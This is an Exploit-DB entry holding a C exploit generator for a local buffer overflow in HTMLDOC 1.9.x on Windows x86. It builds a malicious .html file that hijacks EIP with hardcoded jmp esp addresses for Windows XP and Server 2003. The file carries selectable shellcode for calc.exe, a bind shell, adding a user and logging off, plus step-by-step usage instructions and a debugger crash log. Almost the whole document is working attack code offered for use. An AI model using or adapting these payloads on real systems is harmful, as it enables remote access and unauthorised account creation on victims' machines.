HTMLDOC 1.9.x-r1629 (Windows x86) - '.html' Local Buffer Overflow

EDB-ID:

11112

CVE:

N/A

Author:

fl0 fl0w

Type:

local

Platform:

Windows_x86

Published:

2010-01-11

/*HTMLDOC 1.9.x-r1629 local .html buffer overflow(win32) exploit 
download: http://www.htmldoc.org/software.php?VERSION=1.9.x-r1629&FILE=htmldoc/snapshots/htmldoc-1.9.x-r1629.tar.bz2
[header] 19 bytes [junk] 268 bytes [EIP register] 4 bytes [NOP SLEED] 15 bytes [calc.exe shellcode] 338 bytes
PLEASE READ:
    1.Run the exploit and generate the .html file
    2.After you install HTMLDOC and get a trial licence open it and click on ADD FILES   
    3.Select the generated file and then go to OUTPUT set the output path,and se the output format as you wish for example .PDF
    4.Click GENERATE and calc.exe launches ,success!
This exploit is for windows 32 bits only!    
NOTE: All return addresses are tested on my pc so they work,this is a .C program compiled with Devc++    
Whell if u really want to know the bug: 
-snipp--
 void set_page_size(const char *size){.....	
 char	units[255];		
 if (sscanf(size, "%fx%f%s", &width, &length, units) >= 2)...}
-snipp--
Usage: E:\work\htmlDoc bof 100% exploit\24>htmldoc.exe 0 1
-snipp--
0:001> g
(644.518): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=60000000 ebx=00000000 ecx=7fffffff edx=00036161 esi=004516e0 edi=0012f114
eip=41414141 esp=0012d994 ebp=58585858 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
41414141 ??              ???     <------ next instruction pointer controled
-snipp--
*/
#include<stdio.h>
#include<string.h>

#define HTMLFILE       "htmlsploit.html"
#define is_bigendian() ((*(char*)&i)==0)
#define EIP_OFFSET     287  
#define SHELL_OFFSET   307
char data[]=
   "\x3C\x21\x2D\x2D\x20\x4D\x45\x44\x49\x41\x20\x53\x49\x5A\x45\x20\x31\x78\x31" //header 19 bytes
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"  //junk to cause exeption
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
   "\x41\x41\x41\x41"   //EIP offset 287 bytes overwriten with jmp esp instruction from kernel32.dll module windows xp sp2 
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" //NOP SLEED 16 bytes
   "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"  //calc.exe shellcode 338 bytes
   "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
   "\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
   "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
   "\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
   "\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
   "\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
   "\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
   "\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
   "\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
   "\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
   "\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
   "\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
   "\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
   "\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
   "\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
   "\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
   "\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
   "\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
   "\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
   "\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57\x70\x63"; 
struct 
{ 
   char* shellname;   
   char* shelltype;
}shellc[]=
{
   { 
      "calc.exe",
      "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"  //calc.exe shellcode 338 bytes
      "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
      "\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
      "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
      "\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
      "\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
      "\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
      "\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
      "\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
      "\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
      "\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
      "\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
      "\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
      "\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
      "\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
      "\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
      "\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
      "\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
      "\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
      "\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
      "\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57\x70\x63" 
   },
   { 
     "bind shell",
     "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"  //bind shell
     "\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x67"
     "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x77\x32\x42\x42\x42\x32"
     "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x5a\x49\x49\x6c\x72"
     "\x4a\x48\x6b\x32\x6d\x48\x68\x4c\x39\x39\x6f\x39\x6f\x69\x6f\x43"
     "\x50\x6e\x6b\x50\x6c\x66\x44\x41\x34\x4c\x4b\x73\x75\x47\x4c\x6c"
     "\x4b\x43\x4c\x57\x75\x30\x78\x75\x51\x7a\x4f\x4c\x4b\x42\x6f\x34"
     "\x58\x4e\x6b\x41\x4f\x37\x50\x46\x61\x7a\x4b\x42\x69\x4e\x6b\x46"
     "\x54\x6c\x4b\x63\x31\x6a\x4e\x50\x31\x49\x50\x4c\x59\x6e\x4c\x6f"
     "\x74\x49\x50\x32\x54\x74\x47\x6f\x31\x6b\x7a\x44\x4d\x46\x61\x6f"
     "\x32\x4a\x4b\x4a\x54\x77\x4b\x31\x44\x51\x34\x55\x78\x31\x65\x4b"
     "\x55\x6c\x4b\x33\x6f\x75\x74\x63\x31\x38\x6b\x35\x36\x4e\x6b\x44"
     "\x4c\x70\x4b\x4e\x6b\x43\x6f\x55\x4c\x36\x61\x78\x6b\x36\x63\x66"
     "\x4c\x4e\x6b\x6f\x79\x42\x4c\x31\x34\x57\x6c\x75\x31\x78\x43\x75"
     "\x61\x39\x4b\x50\x64\x4c\x4b\x57\x33\x34\x70\x4c\x4b\x77\x30\x64"
     "\x4c\x4c\x4b\x70\x70\x37\x6c\x4c\x6d\x6e\x6b\x61\x50\x74\x48\x31"
     "\x4e\x30\x68\x6c\x4e\x62\x6e\x44\x4e\x78\x6c\x72\x70\x39\x6f\x79"
     "\x46\x63\x56\x76\x33\x70\x66\x42\x48\x56\x53\x37\x42\x53\x58\x62"
     "\x57\x41\x63\x54\x72\x63\x6f\x51\x44\x59\x6f\x5a\x70\x50\x68\x7a"
     "\x6b\x6a\x4d\x4b\x4c\x47\x4b\x62\x70\x59\x6f\x6e\x36\x71\x4f\x6f"
     "\x79\x4d\x35\x43\x56\x6b\x31\x4a\x4d\x33\x38\x34\x42\x31\x45\x52"
     "\x4a\x55\x52\x79\x6f\x6e\x30\x73\x58\x6a\x79\x77\x79\x4c\x35\x4c"
     "\x6d\x52\x77\x39\x6f\x69\x46\x72\x73\x71\x43\x61\x43\x41\x43\x30"
     "\x53\x42\x63\x46\x33\x42\x63\x71\x43\x4b\x4f\x58\x50\x71\x76\x30"
     "\x68\x32\x31\x71\x4c\x65\x36\x41\x43\x6b\x39\x58\x61\x6a\x35\x63"
     "\x58\x59\x34\x76\x7a\x30\x70\x4b\x77\x61\x47\x49\x6f\x4a\x76\x71"
     "\x7a\x42\x30\x53\x61\x41\x45\x6b\x4f\x5a\x70\x53\x58\x6e\x44\x6c"
     "\x6d\x64\x6e\x6d\x39\x36\x37\x49\x6f\x4b\x66\x73\x63\x30\x55\x39"
     "\x6f\x4e\x30\x52\x48\x4d\x35\x41\x59\x6f\x76\x32\x69\x70\x57\x49"
     "\x6f\x4e\x36\x66\x30\x66\x34\x30\x54\x43\x65\x4b\x4f\x4a\x70\x4f"
     "\x63\x63\x58\x39\x77\x50\x79\x68\x46\x64\x39\x36\x37\x39\x6f\x4e"
     "\x36\x70\x55\x4b\x4f\x6e\x30\x63\x56\x31\x7a\x32\x44\x42\x46\x31"
     "\x78\x33\x53\x72\x4d\x4d\x59\x78\x65\x50\x6a\x52\x70\x70\x59\x57"
     "\x59\x38\x4c\x6b\x39\x5a\x47\x31\x7a\x72\x64\x4e\x69\x4b\x52\x70"
     "\x31\x49\x50\x78\x73\x4e\x4a\x4b\x4e\x71\x52\x56\x4d\x6b\x4e\x72"
     "\x62\x34\x6c\x4f\x63\x6e\x6d\x33\x4a\x77\x48\x4e\x4b\x6c\x6b\x4c"
     "\x6b\x55\x38\x32\x52\x6b\x4e\x58\x33\x56\x76\x59\x6f\x70\x75\x43"
     "\x74\x49\x6f\x7a\x76\x43\x6b\x36\x37\x70\x52\x36\x31\x31\x41\x31"
     "\x41\x52\x4a\x54\x41\x70\x51\x51\x41\x50\x55\x63\x61\x6b\x4f\x58"
     "\x50\x73\x58\x4c\x6d\x79\x49\x43\x35\x4a\x6e\x31\x43\x4b\x4f\x7a"
     "\x76\x71\x7a\x59\x6f\x4b\x4f\x64\x77\x6b\x4f\x38\x50\x4c\x4b\x50"
     "\x57\x79\x6c\x4c\x43\x5a\x64\x70\x64\x4b\x4f\x4e\x36\x33\x62\x79"
     "\x6f\x6e\x30\x41\x78\x4c\x30\x6f\x7a\x43\x34\x51\x4f\x50\x53\x79"
     "\x6f\x4a\x76\x4b\x4f\x4e\x30\x67"
   },
   { 
     "win32 adduser",
     "\xfc\xbb\xfb\xe2\x33\x0b\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85"    //win32 adduser
     "\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x07\x0a\x77\x0b\xf7\xcb\xf3"
     "\x4e\xcb\x40\x7f\x54\x4b\x56\x6f\xdd\xe4\x40\xe4\xbd\xda\x71\x11"
     "\x08\x91\x46\x6e\x8a\x4b\x97\xb0\x14\x3f\x5c\xf0\x53\x38\x9c\x3b"
     "\x96\x47\xdc\x57\x5d\x7c\xb4\x83\x9a\xf7\xd1\x47\xfd\xd3\x18\xb3"
     "\x64\x90\x17\x08\xe2\xf9\x3b\x8f\x1f\x8e\x58\x04\xde\x7b\xe9\x46"
     "\xc5\x7f\x29\x47\xc5\x1b\x26\xe8\xf5\x66\xf8\x91\xf9\xe3\xb9\x6d"
     "\x89\x83\x25\xc3\x06\x0b\x5e\xf0\x10\x40\xde\xb6\x23\x56\xdf\x3d"
     "\x4b\x6a\x80\x70\x7a\xf2\x68\xfa\x7a\x71\x54\x87\x2a\x1d\xa5\xf2"
     "\xcf\x82\x2d\x9b\x2e\xb6\xa0\xcc\x31\x21\xdf\x9f\xa9\x83\x45\x18"
     "\x57\xfb\xaa\xbb\xb7\x95\xd1\x4f\x98\x1c\x69\xd5\xaa\xfe\xfa\x25"
     "\x7b\x8a\x24\x31\x4b\x42\x51\x9d\x84\xe3\xdd\x99\xfa\xc5\xfb\x01"
     "\x95\x6c\x70\x62\x05\x01\x1b\x03\xb9\xba\xa9\xac\x34\x34\x6e\x72"
     "\xd3\xd9\x07\x1a\x72\x52\xac\x90\xe5\xe0\x23\x27\x95\x28\xcb\xf7"
     "\x69\x5c\x13\xd7\xc8\xd8\x17\x27\xcb\xe0\x97\x27\xcb"
                                                                                 },
   { 
    "log off",
    "\xfc\xbb\x25\x48\xf4\xb3\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85" //Log off
    "\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xd9\xa0\xb0\xb3\x21\x31\xb2"
    "\xf1\x1d\xba\xb8\xfc\x25\xbd\xaf\x74\x9a\xa5\xa4\xd4\x04\xd7\x51"
    "\xa3\xcf\xe3\x2e\x35\x21\x3a\xf1\xaf\x11\xb9\x31\xbb\x6e\x03\x7b"
    "\x49\x71\x41\x97\xa6\x4a\x11\x4c\x43\xd9\x7c\x07\x14\x05\x7e\xf3"
    "\xcd\xce\x8c\x48\x99\x8f\x90\x4f\x76\xa4\xb5\xc4\x89\x51\x4c\x86"
    "\xad\xa1\x8c\x06\x6e\xcd\x99\x29\x5e\x88\x5e\xd1\x92\x19\x1e\x2e"
    "\x20\x6d\x83\x83\xbd\xe5\xb3\x30\xc8\x7e\x43\x76\xcb\x80\x44\xfc"
    "\xa4\xbc\x1b\x33\xc3\xdc\xf5\xba\xd3\x9f\x3a\xc7\x73\xf7\x4a\xb2"
    "\x70\x58\xc3\x5b\x86\xec\x1d\x0b\x88\x17\x52\xdb\x03\xa3\xf1\x74"
    "\x9b\x25\xda\xa7\x0f\x99\x37\xcc\xef\xe9\x77\x2c\xf0\x09\x78\x2c"
    "\xf0"
                                                                                 },
   {
    NULL,NULL
   }
   };   
                            
   char banner[]=
   {
      "**************************************************************\n"
      "HTMLDOC 1.8.27.1 local .html buffer overflow(win32) exploit  *\n"
      "                         by fl0 fl0w                         *\n"  
      "Usage: htmldoc.exe 0 3                                       *\n"
      " argv[1]=shellcode;       argv[2]=retaddress                 *\n"
      "**************************************************************\n"
   };              
            //"\x7B\x46\x86\x7C"  //Microsoft Windows Xp Pro sp3 JMP ESP Kernel32.dll  0x7C86467B
/*-------target structure-------------*/
struct 
{
   unsigned int eip;
   char *windows;}target[]=
   { //jmp esp addr
   {
      0x7C874413,"Windows xp sp3"
   }, //jmp esp module kernel32.dll
   {
      0x7C82385D,"Windows xp sp2"
   }, //jmp esp module kernel32.dll
   {
      0x77D20738,"Windows server 2003 corporate sp0"
   }, //jmp esp module user32.dll
   {
      0x77BCF856,"Windows server 2003 Enterprise sp0"
   },//call esp from msvcrt.dll
   {
      0xdeadc0de,"Test b0f in debugger(results in a crash)"
   },
   {
     NULL
   }
};   
/*--------prototypes-----------------*/
   int cpy(char*,char*);
   void print(char*);
   int printTargets();        
   int fileBuild(char*,char*);   
   int printShell();
   int reverseInt(unsigned int);
/*----extern variables--------------*/           
    char buffer[100000]; 
    char fbuffer[100000];
    int i;
    //unsigned int T;
    int S;
    int j;
    int T;
/*--------main---------*/ 
   int main(int argc,char* argv[])
   {
       system("CLS");
       
       cpy(banner,buffer);
       printf("%s",buffer);
       
       print("Starting exploit...");
       
       printShell();
       printTargets();
       
       if (argc < 2) 
       {
         print("Too few args");
         exit(0);
       }
         memcpy(fbuffer, data, strlen(data)); 
         j=atoi(argv[1]);
         
         switch(j)
         {
           case 0:
              memcpy(fbuffer+SHELL_OFFSET,shellc[0].shelltype,sizeof(shellc[0].shelltype));
              break;
           case 1:
              memcpy(fbuffer+SHELL_OFFSET,shellc[1].shelltype,sizeof(shellc[1].shelltype));
              break;             
           case 2:
              memcpy(fbuffer+SHELL_OFFSET,shellc[2].shelltype,sizeof(shellc[2].shelltype));
              break;      
           case 3:
              memcpy(fbuffer+SHELL_OFFSET,shellc[3].shelltype,sizeof(shellc[3].shelltype));
              memset(fbuffer+SHELL_OFFSET+strlen(shellc[3].shelltype),0x90,161);
              break;      
           default: exit(0);
        } 
        
        T=atoi(argv[2]);    
        
        if (T==0)
        {
          reverseInt(target[T].eip);
          memcpy(fbuffer+EIP_OFFSET,&target[T].eip,4);}
              else
        if (T==1)
        {
          reverseInt(target[T].eip);
          memcpy(fbuffer+EIP_OFFSET,&target[T].eip,4); 
        }
              else 
        if (T==2)
        {
          reverseInt(target[T].eip);
          memcpy(fbuffer+EIP_OFFSET,&target[T].eip,4);
        }
              else
        if (T==3)
        {
          reverseInt(target[T].eip);
          memcpy(fbuffer+EIP_OFFSET,&target[T].eip,4);
        }
             else 
        if (T==4)
        {
          reverseInt(target[T].eip);
          memcpy(fbuffer+EIP_OFFSET,&target[T].eip,4);
        }
        
        fileBuild(HTMLFILE,fbuffer);
        printf("You are using the %s ret address\n",target[T].windows);
        printf("You are using the %s shellcode\n",shellc[j].shellname);
        print("Building file");
        print("DONE! file is build");
        
        getchar();
        return 0;
   }
   int fileBuild(char* fname,char* b)
   {
     FILE *f=fopen(fname,"wb");
     
     if (f==NULL)
     { 
        print("File error\n");
        return 0;
     }
     
     fprintf(f,"%s",b);
     
     fclose(f);
     free(b);
     
     return 0;
   }
   int printShell()
   {
     print("These are the available shellcodes");
     
     for (S=0;S<4;S++)
     {
         printf("[^]%s %d\n",shellc[S].shellname,S);
     }
     print("The default will remain calc.exe");
     }      
   int cpy(char* source,char* dest)
   {
     int len;
     len=strlen(source);
     memcpy(dest,source,len+1);
     return len;
   }  
      
   void print(char* msg)
   { 
     printf("\n[*]%s\n",msg); 
   }
   
   int printTargets()
   {
     print("Chose your target:");
     
     for (i=0;i<target[i].eip;i++) 
         printf("[+]%s - 0x%x press %d\n",target[i].windows,target[i].eip,i);
   }    
   
/*-----handle endianness---------------*/     
   int reverseInt(unsigned int i) 
 {
    unsigned char c1, c2, c3, c4;
    
    if (is_bigendian()) 
    {
       return i;
    }else{
          c1=i&255;
          c2=(i>>8)&255;
          c3=(i>>16)&255;
          c4=(i>>24)&255;
    return ((int)c1<<24)+((int)c2<<16)+((int)c3<<8)+c4;
        }
 }